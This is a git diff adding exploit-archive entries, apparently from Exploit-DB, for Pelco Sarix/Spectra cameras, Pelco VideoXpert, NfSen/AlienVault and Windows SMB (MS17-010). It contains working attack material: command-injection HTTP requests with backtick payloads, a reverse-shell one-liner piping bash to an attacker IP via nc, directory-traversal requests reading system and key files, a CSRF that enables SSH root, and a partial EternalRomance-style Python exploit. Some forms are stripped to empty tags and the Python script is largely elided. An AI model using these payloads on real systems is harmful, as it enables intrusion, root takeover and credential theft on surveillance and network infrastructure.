+42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0 +42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0 +42309,platforms/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps,0 +42311,platforms/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps,0 +42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0 +42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0 diff --git a/platforms/hardware/webapps/42307.txt b/platforms/hardware/webapps/42307.txt new file mode 100755 index 000000000..29c7497f8 --- /dev/null +++ b/platforms/hardware/webapps/42307.txt @@ -0,0 +1,168 @@ +Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) + Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) + Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) + Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) + Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) + +Summary: Pelco offers the broadest selection of IP cameras designed +for security surveillance in a wide variety of commercial and industrial +settings. From our industry-leading fixed and high-speed IP cameras to +panoramic, thermal imaging, explosionproof and more, we offer a camera +for any environment, any lighting condition and any application. +When nothing but the best will do. Sarix™ Enhanced Range cameras +provide the most robust feature-set for your mission-critical applications. +With SureVision™ 3.0, Sarix Enhanced delivers the best possible image +in difficult lighting conditions such as a combination of bright areas, +shaded areas, and intense light. Designed with superior reliability, +fault tolerance, and processing speed, these rugged fixed IP cameras +ensure you always get the video that you need. + +Desc: Pelco cameras suffer from multiple dom-based, stored and reflected +XSS vulnerabilities when input passed via several parameters to several +scripts is not properly sanitized before being returned to the user. +This can be exploited to execute arbitrary HTML and script code in a +user's browser session in context of an affected site. + +Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown + MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) + Lighttpd/1.4.28 + PHP/5.3.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5415 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php + + +07.04.2017 + +-- + + +CSRF/XSS on username parameter: +------------------------------- + + + + +
+ + + + + + + + + + + +
+ + + + +CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter: +------------------------------------------------------------------------------------------------------- + + + + +
+ + + + + + + + + +
+ + + + +CSRF/XSS on version parameter: +------------------------------ + + + + +
+ + + + + +
+ + + + +CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter: +---------------------------------------------------------------------------- + + + + +
+ + + + + + + + + + + + +
+ + + + +XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter: +-------------------------------------------------------------------------------- + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + diff --git a/platforms/hardware/webapps/42308.txt b/platforms/hardware/webapps/42308.txt new file mode 100755 index 000000000..154d09978 --- /dev/null +++ b/platforms/hardware/webapps/42308.txt @@ -0,0 +1,82 @@ +Schneider Electric Pelco Sarix/Spectra Cameras CSRF Enable SSH Root Access + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) + Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) + Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) + Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) + Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) + +Summary: Pelco offers the broadest selection of IP cameras designed +for security surveillance in a wide variety of commercial and industrial +settings. From our industry-leading fixed and high-speed IP cameras to +panoramic, thermal imaging, explosionproof and more, we offer a camera +for any environment, any lighting condition and any application. +When nothing but the best will do. Sarix™ Enhanced Range cameras +provide the most robust feature-set for your mission-critical applications. +With SureVision™ 3.0, Sarix Enhanced delivers the best possible image +in difficult lighting conditions such as a combination of bright areas, +shaded areas, and intense light. Designed with superior reliability, +fault tolerance, and processing speed, these rugged fixed IP cameras +ensure you always get the video that you need. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. + +Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown + MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) + Lighttpd/1.4.28 + PHP/5.3.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5416 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5416.php + + +07.04.2017 + +-- + + +CSRF enable ssh root access: +---------------------------- + + + + +
+ + + + +
+ + + + + +CSRF add admin: +--------------- + + + + +
+ + + + + + + +
+ + diff --git a/platforms/hardware/webapps/42309.txt b/platforms/hardware/webapps/42309.txt new file mode 100755 index 000000000..022be59c2 --- /dev/null +++ b/platforms/hardware/webapps/42309.txt @@ -0,0 +1,191 @@ +Schneider Electric Pelco Sarix/Spectra Cameras Root Remote Code Execution + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) + Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) + Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) + Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) + Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) + +Summary: Pelco offers the broadest selection of IP cameras designed +for security surveillance in a wide variety of commercial and industrial +settings. From our industry-leading fixed and high-speed IP cameras to +panoramic, thermal imaging, explosionproof and more, we offer a camera +for any environment, any lighting condition and any application. +When nothing but the best will do. Sarix™ Enhanced Range cameras +provide the most robust feature-set for your mission-critical applications. +With SureVision™ 3.0, Sarix Enhanced delivers the best possible image +in difficult lighting conditions such as a combination of bright areas, +shaded areas, and intense light. Designed with superior reliability, +fault tolerance, and processing speed, these rugged fixed IP cameras +ensure you always get the video that you need. + +Desc: The affected cameras suffer from authenticated remote code +execution vulnerability. The POST parameter 'enable_leds' located +in the update() function called via the GeneralSetupController.php +script is not properly sanitised before being used in writeLedConfig() +function to enable led state to on or off. A remote attacker can +exploit this issue and execute arbitrary system commands granting +her system access with root privileges using a specially crafted +request and escape sequence to system shell. + + +--------------------------------------------------------------------------- +/var/www/core/setup/controllers/GeneralSetupController.php: +----------------------------------------------------------- + +43: public function update() { +44: $errOccurred = false; +45: $logoreboot = false; +46: +47: // If can update general settings +48: if ($this->_context->_user->hasPermission("{51510980-768b-4b26-a44a-2ae49f308184}")) { +49: +50: $errors = $this->validateInputs("setup", "general.invalid"); +51: +52: // +53: $new_logo_path; +54: if (empty($errors) && (strlen($_FILES["new_logo_path"]["name"]) > 0)) { +55: // The user has provided a file to load in as an image. Verify that the file is ok. +56: $errors = $this->storeBmpFileIfValid($new_logo_path, $width, $height); +57: } else { +58: // In this case, get the width and height from the omons settings +59: $width = intval($this->_conf->get("Video/Overlay", "LogoWidth")); +60: $height = intval($this->_conf->get("Video/Overlay", "LogoHeight")); +61: } +62: // +63: if (empty($errors)) { +64: $device_name = $_POST["device_name"]; +65: +66: $this->_conf->set("Device", "FriendlyName", $device_name); +67: +68: // update smtp server; append port 25 if it's not provided by the user +69: $smtpServer = $_POST["smtp_server"]; +70: +71: if ((! empty($smtpServer)) && preg_match(self::kHostPortRegex, $smtpServer) == 0) { +72: $smtpServer .= ":" . self::kDefaultSmtpPort; +73: } +74: +75: $this->_conf->set("Networking", "SmtpServer", $smtpServer); +76: +77: // +78: $success = $this->writeLedConfig($_POST["enable_leds"]); +79: // +80: } else { +81: $this->_context->setError("phobos", "validation.failure"); +82: $this->_context->setErrorList($errors); +83: +84: $errOccurred = true; +85: } +86: } + +... +... +... + +Bonus hint: When uploading a bmp logo, you can modify the width offset for example and inject persistent code: +-- +-> 12h: 00 01 00 00 ; width (max 0x100, min 0x20) +-- +191: if ($logoOverlay) { +192: if($logoreboot) { +193: $cmd = "/usr/bin/overlayLogo " . $logo_justification . " " . $logo_row . " " . $width . " " . $height . " 0"; +194: exec($cmd); +195: } +196: } else { +197: $cmd = "/usr/bin/overlayLogo 1 1 1 1 1"; +198: exec($cmd); +199: } + +... +... +... + +265: $vparams["enable_leds"] = $this->getLedConfig(); +266: // +267: $vparams["device_name"] = $this->_conf->get("Device", "FriendlyName"); +268: $vparams["TimeFormat"] = $this->_conf->get("Video/Overlay", "TimeFormat"); +269: $vparams["date_formats"] = $this->getDateFormats(); +270: $vparams["selectedDateFormat"] = $this->_conf->get("Video/Overlay", "DateFormat"); +271: +272: ob_start(); +273: passthru("date +\"" . $vparams["TimeFormat"] . "\""); +274: $vparams["current_time"] = trim(ob_get_contents()); +275: ob_end_clean(); + +... +... +... + +630: /** @param $state string "on" or "off" */ +631: protected function writeLedConfig($state) { +632: $encoded = array('type' => 'uint32', +633: 'value' => ($state == 'on' ? 1 : 0)); +634: +635: $rest = $this->getRestProxy(); +636: $params = array(array('type' => 'uint32', 'value' => 10), $encoded); +637: $response = $rest->GetWithPayload('/internal/msgbus/com.pelco.hardware.led/SetState?', +638: 'application/json', +639: $params); +640: +641: return ($response->GetStatus() == 200); +642: } + +--------------------------------------------------------------------------- + + +Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown + MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) + Lighttpd/1.4.28 + PHP/5.3.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5417 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5417.php + + +07.04.2017 + +-- + + +PoC sleep 17s: + +POST /setup/system/general/update HTTP/1.1 +Host: 192.168.1.1 +Content-Length: x +Cache-Control: max-age=0 +Origin: http://192.168.1.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Referer: http://192.168.1.1/setup/system/general +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: PHPSESSID=p2ooorb7gloavc0et2stj2tnn4; authos-token=07E14CAF; svcts=1495616826 +Connection: close + +device_name=ZSL&enable_leds=%60sleep%2017%60&smtp_server=&ntp_server_from_dhcp=false&ntp_server=time.nist.gov®ion=Universe&zone=Earth&enable_time_overlay=on&enable_name_overlay=off&position=topright&date_format=0 + +=== + +PoC echo: + +POST /setup/system/general/update HTTP/1.1 +Host: 192.168.1.1 + +enable_leds=%60echo%20251%20>test.html%60 + +-- + +GET http://192.168.1.1/test.html HTTP/1.1 + +Response: + +251 diff --git a/platforms/linux/remote/42306.txt b/platforms/linux/webapps/42306.txt similarity index 100% rename from platforms/linux/remote/42306.txt rename to platforms/linux/webapps/42306.txt diff --git a/platforms/linux/webapps/42314.txt b/platforms/linux/webapps/42314.txt new file mode 100755 index 000000000..50f45dc7f --- /dev/null +++ b/platforms/linux/webapps/42314.txt @@ -0,0 +1,28 @@ +# Exploit Title: NfSen/AlienVault remote root exploit (command injection in customfmt parameter) +# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected. +# Version: AlienVault USM/OSSIM < 4.3.1 +# Date: 2017-07-10 +# Vendor Homepage: http://nfsen.sourceforge.net/ +# Vendor Homepage: http://www.alienvault.com/ +# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download +# Exploit Author: Paul Taylor / Foregenix Ltd +# Website: http://www.foregenix.com/blog +# Tested on: NfSen 1.3.7 +# CVE: CVE-2017-7175, CVE-2017-6972 + +1. Description + +A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972. + +2. Proof of Concept + + +For a reverse shell to attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the "Custom output format:" input box: + +'; nc -ne /bin/bash 10.100.1.2 443 # + +If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability. + +3. Solution: + +Update to latest version of NfSen/USM/OSSIM diff --git a/platforms/windows/local/42310.txt b/platforms/windows/local/42310.txt new file mode 100755 index 000000000..297962768 --- /dev/null +++ b/platforms/windows/local/42310.txt @@ -0,0 +1,107 @@ +Schneider Electric Pelco VideoXpert Privilege Escalations + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Core Software 1.12.105 + Media Gateway Software 1.12.26 + Exports 1.12 + + +Summary: VideoXpert is a video management solution designed for +scalability, fitting the needs surveillance operations of any size. +VideoXpert Ultimate can also aggregate other VideoXpert systems, +tying multiple video management systems into a single interface. + +Desc: The application is vulnerable to an elevation of privileges +vulnerability which can be used by a simple user that can change +the executable file with a binary of choice. The vulnerability exist +due to the improper permissions, with the 'F' flag (full) for the +'Users' group, for several binary files. The service is installed +by default to start on system boot with LocalSystem privileges. +Attackers can replace the binary with their rootkit, and on reboot +they get SYSTEM privileges. + +VideoXpert services also suffer from an unquoted search path issue +impacting the 'VideoXpert Core' and 'VideoXpert Exports' services +for Windows deployed as part of the VideoXpert Setup bundle. This +could potentially allow an authorized but non-privileged local user +to execute arbitrary code with elevated privileges on the system. A +successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application +startup or reboot. If successful, the local user’s code would execute +with the elevated privileges of the application. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5418 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5418.php + + +05.04.2017 + +-- + + +C:\Program Files\Pelco\Core>sc qc "VideoXpert Core" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VideoXpert Core + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START (DELAYED) + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Pelco\Core\tools\nssm.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VideoXpert Core + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +C:\>cacls "C:\Program Files\Pelco\Core\tools\nssm.exe" +C:\Program Files\Pelco\Core\tools\nssm.exe NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + + +C:\ProgramData\Pelco\Core\db\bin>cacls * |findstr "Users:(ID)F" +C:\ProgramData\Pelco\Core\db\bin\libeay32.dll BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\mongod.exe BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\mongos.exe BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\nssm.exe BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\ssleay32.dll BUILTIN\Users:(ID)F + + +C:\>cacls "C:\ProgramData\Pelco\Exports\bin\nssm.exe" +C:\ProgramData\Pelco\Exports\bin\nssm.exe BUILTIN\Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + + +C:\>cacls "C:\ProgramData\Pelco\Gateway\bin\nssm.exe" +C:\ProgramData\Pelco\Gateway\bin\nssm.exe BUILTIN\Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + + + +C:\Users\senad>sc qc "VideoXpert Exports" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VideoXpert Exports + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\ProgramData\Pelco\Exports\bin\nssm.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VideoXpert Exports + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + diff --git a/platforms/windows/remote/42315.py b/platforms/windows/remote/42315.py new file mode 100755 index 000000000..efda10714 --- /dev/null +++ b/platforms/windows/remote/42315.py @@ -0,0 +1,538 @@ +#!/usr/bin/python +from impacket import smb, smbconnection +from mysmb import MYSMB +from struct import pack, unpack, unpack_from +import sys +import socket +import time + +''' +MS17-010 exploit for Windows 7+ by sleepya + +Note: +- The exploit should never crash a target (chance should be nearly 0%) +- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed + +Tested on: +- Windows 2016 x64 +- Windows 2012 R2 x64 +- Windows 8.1 x64 +- Windows 2008 R2 SP1 x64 +- Windows 7 SP1 x64 +- Windows 8.1 x86 +- Windows 7 SP1 x86 +''' + +USERNAME = '' +PASSWORD = '' + +''' +Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext() +win7 x64 +struct SrvSecContext { + DWORD xx1; // second WORD is size + DWORD refCnt; + PACCESS_TOKEN Token; // 0x08 + DWORD xx2; + BOOLEAN CopyOnOpen; // 0x14 + BOOLEAN EffectiveOnly; + WORD xx3; + DWORD ImpersonationLevel; // 0x18 + DWORD xx4; + BOOLEAN UsePsImpersonateClient; // 0x20 +} +win2012 x64 +struct SrvSecContext { + DWORD xx1; // second WORD is size + DWORD refCnt; + QWORD xx2; + QWORD xx3; + PACCESS_TOKEN Token; // 0x18 + DWORD xx4; + BOOLEAN CopyOnOpen; // 0x24 + BOOLEAN EffectiveOnly; + WORD xx3; + DWORD ImpersonationLevel; // 0x28 + DWORD xx4; + BOOLEAN UsePsImpersonateClient; // 0x30 +} + +SrvImpersonateSecurityContext() is used in Windows 7 and later before doing any operation as logged on user. +It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. +From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL, +PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns +STATUS_SUCCESS when Token is NULL. +If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM) +to do all SMB operations. +Note: fake Token might be possible, but NULL token is much easier. +''' +WIN7_INFO = { + 'SESSION_SECCTX_OFFSET': 0xa0, + 'SESSION_ISNULL_OFFSET': 0xba, + 'FAKE_SECCTX': pack(' ".format(sys.argv[0])) + sys.exit(1) + +target = sys.argv[1] +pipe_name = sys.argv[2] + +exploit(target, pipe_name) +print('Done') \ No newline at end of file diff --git a/platforms/windows/webapps/42311.txt b/platforms/windows/webapps/42311.txt new file mode 100755 index 000000000..0ad3e35a3 --- /dev/null +++ b/platforms/windows/webapps/42311.txt @@ -0,0 +1,149 @@ +Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: 2.0.41 + 1.14.7 + 1.12.105 + +Summary: VideoXpert is a video management solution designed for +scalability, fitting the needs surveillance operations of any size. +VideoXpert Ultimate can also aggregate other VideoXpert systems, +tying multiple video management systems into a single interface. + +Desc: Pelco VideoXpert suffers from a directory traversal vulnerability. +Exploiting this issue will allow an unauthenticated attacker to +view arbitrary files within the context of the web server. + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Jetty(9.2.6.v20141205) + MongoDB/3.2.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5419 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php + + +05.04.2017 + +-- + + +PoC: +---- + +GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1 +Host: 172.19.0.198 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close + + +HTTP/1.1 200 OK +Date: Wed, 05 Apr 2017 13:27:39 GMT +Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT +Cache-Control: public, max-age=86400 +Content-Type: text/html; charset=UTF-8 +Vary: Accept-Encoding +ETag: 1247548162000 +Content-Length: 403 +Connection: close + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 +[MCI Extensions.BAK] +3g2=MPEGVideo +3gp=MPEGVideo +3gp2=MPEGVideo +3gpp=MPEGVideo +aac=MPEGVideo +adt=MPEGVideo +adts=MPEGVideo +m2t=MPEGVideo +m2ts=MPEGVideo +m2v=MPEGVideo +m4a=MPEGVideo +m4v=MPEGVideo +mod=MPEGVideo +mov=MPEGVideo +mp4=MPEGVideo +mp4v=MPEGVideo +mts=MPEGVideo +ts=MPEGVideo +tts=MPEGVideo + + +------ + + +GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1 +Host: 172.19.0.198 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close + + +HTTP/1.1 200 OK +Date: Thu, 06 Apr 2017 11:59:07 GMT +Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT +Cache-Control: public, max-age=86400 +Content-Type: text/html; charset=UTF-8 +ETag: 1491397116000 +Content-Length: 9 +Connection: close + +T0ps3cret + + +------ + + +bash-4.4$ cat pelco_system_ini.txt +GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1 +Host: 172.19.0.198 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close + +bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt +Ncat: Version 7.40 ( https://nmap.org/ncat ) +Ncat: Connected to 172.19.0.198:80. +HTTP/1.1 200 OK +Date: Thu, 06 Apr 2017 12:30:01 GMT +Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT +Cache-Control: public, max-age=86400 +Content-Type: text/html; charset=UTF-8 +ETag: 1244668084000 +Content-Length: 219 +Connection: close + +; for 16-bit app support +[386Enh] +woafont=dosapp.fon +EGA80WOA.FON=EGA80WOA.FON +EGA40WOA.FON=EGA40WOA.FON +CGA80WOA.FON=CGA80WOA.FON +CGA40WOA.FON=CGA40WOA.FON + +[drivers] +wave=mmdrv.dll +timer=timer.drv + +[mci] +Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds. +bash-4.4$ + diff --git a/platforms/windows/webapps/42312.txt b/platforms/windows/webapps/42312.txt new file mode 100755 index 000000000..70fc9c320 --- /dev/null +++ b/platforms/windows/webapps/42312.txt @@ -0,0 +1,81 @@ +Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: 2.0.41 + 1.14.7 + 1.12.105 + +Summary: VideoXpert is a video management solution designed for +scalability, fitting the needs surveillance operations of any size. +VideoXpert Ultimate can also aggregate other VideoXpert systems, +tying multiple video management systems into a single interface. + +Desc: The software transmits sensitive data using double Base64 encoding +for the Cookie 'auth_token' in a communication channel that can be +sniffed by unauthorized actors or arbitrarely be read from the vxcore +log file directly using directory traversal attack resulting in +authentication bypass / session hijacking. +Ref: ZSL-2017-5419 + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Jetty(9.2.6.v20141205) + MongoDB/3.2.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5420 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5420.php + + +05.04.2017 + +-- + + +After a user logs in, the web server creates a Cookie: auth_token which has the following value: + +ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5 + +Base64 decoding that becomes: + +eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbjEyMyIsImRvbWFpbiI6IkxPQ0FMIiwiZXhwaXJlcyI6MTQ5MTU1Njc5NzE1OCwiYWdlbnQiOiI0MGY2NDM4Ni1mZmMwLTQ1NDEtOWNjZC1hNTIyM2RiMmZjMDkiLCJjbGllbnRJcCI6IjEyNy4wLjAuMSJ9 + +Again decoding, gives us result: + +{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"} + + +PoC remote session takeover with directory traversal: +----------------------------------------------------- + +bash-4.4$ cat pelco_live.txt +GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\core\vxcore.log HTTP/1.1 +Host: 127.0.0.1 +Connection: close +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 +Content-Type: text/plain; charset=utf-8 +Accept: */* +Referer: https://127.0.0.1/portal/ +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +DNT: 1 + +bash-4.4$ ncat -v -n 127.0.0.1 80 < pelco_live.txt > vxcore_log.txt +bash-4.4$ cat vxcore_log.txt +--snip-- +INFO [2017-04-06 11:20:09.999] [HealthCheckMonitorPollingThread-0] org.mongodb.driver.connection: Closed connection [connectionId{localValue:400, serverValue:473}] to mongod0-rs1-dfde27ce-6a4f-413a-a7c2-6df855d462df:31001 because the pool has been closed. +INFO [2017-04-06 11:20:12.559] [dw-5099 - GET /portal/System.html?auth_token=ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/System.html +INFO [2017-04-06 11:20:12.567] [dw-5055 - GET /portal/Lilac.css] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/Lilac.css +INFO [2017-04-06 11:20:12.568] [dw-5098 - GET /portal/lilac/lilac.nocache.js] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/lilac/lilac.nocache.js +--snip-- + +bash-4.4$ cat pelco_auth_token.txt +ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5 +bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D - +{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"} +bash-4.4$ +